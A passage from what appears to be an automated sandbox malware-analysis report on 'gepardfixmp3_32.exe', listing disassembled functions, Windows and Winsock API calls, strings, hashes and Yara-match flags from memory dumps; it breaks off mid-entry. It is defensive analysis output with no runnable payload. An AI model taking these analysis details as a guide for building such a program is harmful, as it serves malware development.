                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 830998967-0
                                                            • Opcode ID: 1d7e4fbff4ec0e9cb410e43af22dfb59693948f86703b234b065d5ad0009fa2b
                                                            • Instruction ID: 105d226e89564a1405de3cae4e7a82a1bf8aa6a62ad0499a1e8cda537eb7226c
                                                            • Opcode Fuzzy Hash: 1d7e4fbff4ec0e9cb410e43af22dfb59693948f86703b234b065d5ad0009fa2b
                                                            • Instruction Fuzzy Hash: BFF06776642205BBDB00AFA0EC88FD7BBACFF04301F000912F60186840CB61BA288BE0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 4104443479-4289949731
                                                            • Opcode ID: 54f717355118b6ae792decaa9d99711e419aa71ace3f2dc5360751be82cdb9e5
                                                            • Instruction ID: 0cc5957ca6c91f2ba779c15b5006cb11b059050e3cd2268db908d0f7f02f9127
                                                            • Opcode Fuzzy Hash: 54f717355118b6ae792decaa9d99711e419aa71ace3f2dc5360751be82cdb9e5
                                                            • Instruction Fuzzy Hash: 0441A2757003249BD7349E69DC80E66B7BAEF81B54B140A2DF856CB680CF70E909CBB1
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C230C3
                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02C23102
                                                            • _memcmp.LIBCMT ref: 02C23141
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressErrorLastString_memcmp
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 1618111833-2422070025
                                                            • Opcode ID: 451b2c528db01170acfa90cd751bc8038dceae9b4f83aa71c655124a74113d39
                                                            • Instruction ID: cbc0cc33934a6991413d7dd49ea0fc5986b83cf470f94a68138b86012c82a33d
                                                            • Opcode Fuzzy Hash: 451b2c528db01170acfa90cd751bc8038dceae9b4f83aa71c655124a74113d39
                                                            • Instruction Fuzzy Hash: B331E772A00364DFDB319F64CC8079EB7B5AF85328F1049A9EC5597280DF759949CF90
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C21F5B
                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C21FC5
                                                            • GetLastError.KERNEL32(?,00000000), ref: 02C21FD2
                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                            • String ID: iocp
                                                            • API String ID: 998023749-976528080
                                                            • Opcode ID: 178544e32a43a1b99867d163304732667962b737bf954de3304c7301c5ed5d08
                                                            • Instruction ID: 857fbc7a2ba57337251da294e2884f5249cb81b73832ff27596133aa73351778
                                                            • Opcode Fuzzy Hash: 178544e32a43a1b99867d163304732667962b737bf954de3304c7301c5ed5d08
                                                            • Instruction Fuzzy Hash: 3A21B7B1901B549FC720DF6AD54455BFBF8FFA4710B108A1FD4A687A60D7B0A604CF91
                                                            APIs
                                                            • _malloc.LIBCMT ref: 02C33B74
                                                              • Part of subcall function 02C32FBC: __FF_MSGBANNER.LIBCMT ref: 02C32FD3
                                                              • Part of subcall function 02C32FBC: __NMSG_WRITE.LIBCMT ref: 02C32FDA
                                                              • Part of subcall function 02C32FBC: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001), ref: 02C32FFF
                                                            • std::exception::exception.LIBCMT ref: 02C33B92
                                                            • __CxxThrowException@8.LIBCMT ref: 02C33BA7
                                                              • Part of subcall function 02C3456A: RaiseException.KERNEL32(?,?,02C2FB63,?,?,?,?,?,?,?,02C2FB63,?,02C50F98,?), ref: 02C345BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                            • String ID: bad allocation
                                                            • API String ID: 3074076210-2104205924
                                                            • Opcode ID: 25db4a83bd34efe6b113bff5eef1da7b3a42af3102540fbd3ffa640104e00133
                                                            • Instruction ID: d0531db0048c2d160b1dfa3e1906de957ce522a44dfb2fb379f88d94797e6441
                                                            • Opcode Fuzzy Hash: 25db4a83bd34efe6b113bff5eef1da7b3a42af3102540fbd3ffa640104e00133
                                                            • Instruction Fuzzy Hash: 6CE0E57090020DAADF12FEA4CC14DEFB769AF00304F004A95EC00A6190DF319F40DAD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C237B6
                                                            • __localtime64.LIBCMT ref: 02C237C1
                                                              • Part of subcall function 02C32610: __gmtime64_s.LIBCMT ref: 02C32623
                                                            • std::exception::exception.LIBCMT ref: 02C237D9
                                                              • Part of subcall function 02C324E3: std::exception::_Copy_str.LIBCMT ref: 02C324FC
                                                              • Part of subcall function 02C2A52C: __EH_prolog.LIBCMT ref: 02C2A531
                                                              • Part of subcall function 02C2A52C: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A540
                                                              • Part of subcall function 02C2A52C: __CxxThrowException@8.LIBCMT ref: 02C2A55F
                                                            Strings
                                                            • could not convert calendar time to UTC time, xrefs: 02C237CE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                            • String ID: could not convert calendar time to UTC time
                                                            • API String ID: 1963798777-2088861013
                                                            • Opcode ID: 5be3c628b21763593a0af967f54b0895bf91a7baeaf49425bedc10138a870ba3
                                                            • Instruction ID: 64f2c60f7fa24571a9375867bde859f413df977e957bcc6037f7097b79e3a1e9
                                                            • Opcode Fuzzy Hash: 5be3c628b21763593a0af967f54b0895bf91a7baeaf49425bedc10138a870ba3
                                                            • Instruction Fuzzy Hash: A8E039B1D006099BCF01EFA0DD007AFB779EB04304F404999D815A2540DF345A19DE85
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32 ref: 00402564
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe,00000104), ref: 0040D5BE
                                                            Strings
                                                            • Epic Project Studio 10.4.46, xrefs: 0040D5C4
                                                            • C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe, xrefs: 0040256A, 0040D502
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Module$FileHandleName
                                                            • String ID: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe$Epic Project Studio 10.4.46
                                                            • API String ID: 4146042529-3732494730
                                                            • Opcode ID: 90c7f0ba5e38fb3c55aa98df56fde6d357ea41fcc1a9c7df613aac30beb687d1
                                                            • Instruction ID: 75098c12ea0d7d7c1088c8f1e2e7b289b8c8a0f5eb702ab037642d6c5b5ef3a7
                                                            • Opcode Fuzzy Hash: 90c7f0ba5e38fb3c55aa98df56fde6d357ea41fcc1a9c7df613aac30beb687d1
                                                            • Instruction Fuzzy Hash: 4FD0A7B0D84301EBD3405FE09F4CA6979646E04304730813BAA43B20D1C7BC0A0EA66F
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00402E6A), ref: 0040315F
                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040316F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                            • API String ID: 1646373207-3105848591
                                                            • Opcode ID: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                            • Instruction ID: 396ae008ee37b43aaac66eedf252cb0d6854bca9fd0baad0eaa83bc1c4717f20
                                                            • Opcode Fuzzy Hash: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                            • Instruction Fuzzy Hash: 14C01270380B00A6EA201FB20F0AB2628AC1B48B03F1800BEA289F81C0CE7CC600843D
                                                            APIs
                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040403A), ref: 00404C3D
                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040403A), ref: 00404C61
                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040403A), ref: 00404C7B
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040403A), ref: 00404D3C
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040403A), ref: 00404D53
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual$FreeHeap
                                                            • String ID:
                                                            • API String ID: 714016831-0
                                                            • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                            • Instruction ID: 583ec5426b209604bff2a02b3d2478297b9ba55a468d27544d52312baf66a8bd
                                                            • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                            • Instruction Fuzzy Hash: BC31E2B15417019BE3348F24EE44B22B7A0EBC8754F11863AE665B73E1EB78A844CB5C
                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00008000,00004000,7622DFF0,?,00000000), ref: 00404696
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004046F1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00404703
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Free$Virtual$Heap
                                                            • String ID: 4/@
                                                            • API String ID: 2016334554-3101945251
                                                            • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                            • Instruction ID: 876bcf6037267374920b0e9be09a40bf20dde446c7cba65ee9efa19dd1b870bf
                                                            • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                            • Instruction Fuzzy Hash: 4AB18EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AdjustPointer_memmove
                                                            • String ID:
                                                            • API String ID: 1721217611-0
                                                            • Opcode ID: 76da1e3e4a163cde92bbc4e14c1c22ec124f8dc37d5fa0b7ce957f908d9f8ac5
                                                            • Instruction ID: 11225a7d21be1f65f671095723664cdb0673bc96cf46fa363a3147f188a43176
                                                            • Opcode Fuzzy Hash: 76da1e3e4a163cde92bbc4e14c1c22ec124f8dc37d5fa0b7ce957f908d9f8ac5
                                                            • Instruction Fuzzy Hash: 4F4176762043025AEB2A5F29D850BBF37A59F45764F18086FE849A61E0DF71E780EE10
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C313CF
                                                              • Part of subcall function 02C23FDC: __EH_prolog.LIBCMT ref: 02C23FE1
                                                              • Part of subcall function 02C23FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02C23FF3
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C313C4
                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C31410
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C314E1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                            • String ID:
                                                            • API String ID: 2825413587-0
                                                            • Opcode ID: a8c0d8f98b1bb9f78fcdcb1119903bb311786e72dea60eee57daa3bb092d853d
                                                            • Instruction ID: 5ca8270b6c61339f6486d5049a2412430b1d18356918c4b8b42ebf03a15d2264
                                                            • Opcode Fuzzy Hash: a8c0d8f98b1bb9f78fcdcb1119903bb311786e72dea60eee57daa3bb092d853d
                                                            • Instruction Fuzzy Hash: 365190756003458FDB22DF28C88479AB7E4AF89328F194A28F86D97290DB75E905CB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: f1e0d6f35f92a1c2d6db0eb12c2164ac267801fa587fdbb3584523d5f00b00db
                                                            • Instruction ID: 2a240d031717875c6cd8aaab47b3b9cd4db82dcae6eba9d07b05fb32cb0ced44
                                                            • Opcode Fuzzy Hash: f1e0d6f35f92a1c2d6db0eb12c2164ac267801fa587fdbb3584523d5f00b00db
                                                            • Instruction Fuzzy Hash: C1412871B00786DFDB1A8F69C8805AE7BA6EF85354B1489BEE805C7280D771DE81CBC0
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3FF5B
                                                            • __isleadbyte_l.LIBCMT ref: 02C3FF89
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02C3FFB7
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02C3FFED
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: a0ac62566d367f50e765f13e67fe34fecc982100a2f84f34f15898e0268eedd5
                                                            • Instruction ID: e5d6c90d4a0bd2b865d402905884ed0ce6a16cecd8cddce34aa503aed9e3d81e
                                                            • Opcode Fuzzy Hash: a0ac62566d367f50e765f13e67fe34fecc982100a2f84f34f15898e0268eedd5
                                                            • Instruction Fuzzy Hash: C731EF31A00246AFDB229E25C844BABBBF5FF86354F154C69F864C7490D732E950DB90
                                                            APIs
                                                            • htons.WS2_32(?), ref: 02C23DA2
                                                              • Part of subcall function 02C23BD3: __EH_prolog.LIBCMT ref: 02C23BD8
                                                              • Part of subcall function 02C23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                            • htonl.WS2_32(00000000), ref: 02C23DB9
                                                            • htonl.WS2_32(00000000), ref: 02C23DC0
                                                            • htons.WS2_32(?), ref: 02C23DD4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                            • String ID:
                                                            • API String ID: 3882411702-0
                                                            • Opcode ID: 909c6e11296864a70e6b4dacbc54f9443a4b5bb2cb7b911600b9525464e50d3f
                                                            • Instruction ID: 0e90e9abd77a2e8bf1a8a8ae1a733b176d8ff05a6ad9c9fac280b77559953717
                                                            • Opcode Fuzzy Hash: 909c6e11296864a70e6b4dacbc54f9443a4b5bb2cb7b911600b9525464e50d3f
                                                            • Instruction Fuzzy Hash: 4D118E39A10259EFCF019F64D889A9AB7B9EF49310F008496FD08DF205DB71DA18CBA1
                                                            APIs
                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02C223D0
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C223DE
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22401
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22408
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 4018804020-0
                                                            • Opcode ID: 868cb89f7c02238417494f4f1d049e10abda961c1285628f81c7451f48586ac3
                                                            • Instruction ID: 4f311c9f33932b2e697ceb0a2f849ebeb0ed89e8cea95268ba0a5c34f71b555b
                                                            • Opcode Fuzzy Hash: 868cb89f7c02238417494f4f1d049e10abda961c1285628f81c7451f48586ac3
                                                            • Instruction Fuzzy Hash: 0211CE71601305ABDB209F60D984B67BBB8FF80708F10446DF9019B100DBB1FA19CBE1
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22EEE
                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22EFD
                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22F0C
                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C22F36
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Socketsetsockopt
                                                            • String ID:
                                                            • API String ID: 2093263913-0
                                                            • Opcode ID: 61544530d120c610c5deb9c28494cbb96630580348bc02349be2afd0ef5ce547
                                                            • Instruction ID: d963759b122290f017d747132cf08f8d023d6dffc1706b105e2317fc62014283
                                                            • Opcode Fuzzy Hash: 61544530d120c610c5deb9c28494cbb96630580348bc02349be2afd0ef5ce547
                                                            • Instruction Fuzzy Hash: A9017576950214BBDB309F65DC48B9BBBADEB89761F008965FD08CB181D77189048BA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 4e34f7c316a51036a7584afbeb688741b4a16f132d6c2f9a1a22064d208f5c88
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: A201093604014ABBCF136E84DC418EE3F66BF59354B498816FA2969121D336C7B1AB82
                                                            APIs
                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C224A9
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C224B8
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C224CD
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C224D4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 4018804020-0
                                                            • Opcode ID: 43c59ae388f5b0abb6caded863f2637e3d587918e763cc23a3f3a739067d01cf
                                                            • Instruction ID: 85e54bd9f380a8553452c21285e7eed1e3631528d68bcf27e66ad06b5954a186
                                                            • Opcode Fuzzy Hash: 43c59ae388f5b0abb6caded863f2637e3d587918e763cc23a3f3a739067d01cf
                                                            • Instruction Fuzzy Hash: E3F03C76541205AFDB009FA9E884F9ABBACFF48710F004519FA04CA141D771E5648FE1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C22009
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02C22028
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C22037
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C2204E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                            • String ID:
                                                            • API String ID: 2456309408-0
                                                            • Opcode ID: 19fe84b63ee984dc3dadc176eda511be36106ebf5acfbfd5ad126c6f7a49355b
                                                            • Instruction ID: 306641222f56e8aa85514a41ccb3e7846c2ec41868da6dc555ee5acdca508c3c
                                                            • Opcode Fuzzy Hash: 19fe84b63ee984dc3dadc176eda511be36106ebf5acfbfd5ad126c6f7a49355b
                                                            • Instruction Fuzzy Hash: 6B01DC714006149FC328AF64E948BABFBF4FF04309F404A5EE84692590CF706A5CCF91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$H_prologSleep
                                                            • String ID:
                                                            • API String ID: 1765829285-0
                                                            • Opcode ID: 5261a19fa8644bf2198163f83f98e005f8dfec5f0b0f7181a6af8e63d6ad7467
                                                            • Instruction ID: 47cc852d7ce82108bc3f7b9d5edafd17eb1dbeed916d34d7f1647c669f44964a
                                                            • Opcode Fuzzy Hash: 5261a19fa8644bf2198163f83f98e005f8dfec5f0b0f7181a6af8e63d6ad7467
                                                            • Instruction Fuzzy Hash: 4BF05435A41110DFCB009F94D8C8B99BBB4FF0D311F5082A9F519DB290CB359854CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog_memmove
                                                            • String ID: &'
                                                            • API String ID: 3529519853-655172784
                                                            • Opcode ID: 383f8d39c327b1236480772d3b3b029b976bb759fd34aabe3126add5349e66b0
                                                            • Instruction ID: 2a44ebf02c89191a2c41adf71a4c05fb41380bb55dfe9ae1369f37a9d7f57a25
                                                            • Opcode Fuzzy Hash: 383f8d39c327b1236480772d3b3b029b976bb759fd34aabe3126add5349e66b0
                                                            • Instruction Fuzzy Hash: A8617E71D00229DFDF21EFA4C951BEEBBB6EF48310F14815AD519AB180DB709A09DFA1
                                                            APIs
                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406043
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID: $
                                                            • API String ID: 1807457897-3032137957
                                                            • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                            • Instruction ID: a42b242f0737112a64efb8245030e7df3adc9bcb2e8c8469847d94988edb9e3f
                                                            • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                            • Instruction Fuzzy Hash: 7B413731004158AEEB119754DD89BFB3FE9DB06700F1501F6D58BFB1D3C23949648BAA
                                                            APIs
                                                              • Part of subcall function 02C22D39: WSASetLastError.WS2_32(00000000), ref: 02C22D47
                                                              • Part of subcall function 02C22D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02C22D5C
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22E6D
                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C22E83
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Sendselect
                                                            • String ID: 3'
                                                            • API String ID: 2958345159-280543908
                                                            • Opcode ID: 30651a8b98a73a47084ae085830efda0ef942b54d4b1601344662bb92b37d696
                                                            • Instruction ID: 3d8cc4014f7dd0404e5a610a1f8135c82f5f53431d7b2d074f93a9836fc7bfe8
                                                            • Opcode Fuzzy Hash: 30651a8b98a73a47084ae085830efda0ef942b54d4b1601344662bb92b37d696
                                                            • Instruction Fuzzy Hash: 7031E0B6E102259FDF11DF60C8147EEBBEAEF48318F00495AEC0497280EB749599DFA1
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C283D7,?,?,00000000), ref: 02C296D4
                                                            • getsockname.WS2_32(?,?,?), ref: 02C296EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
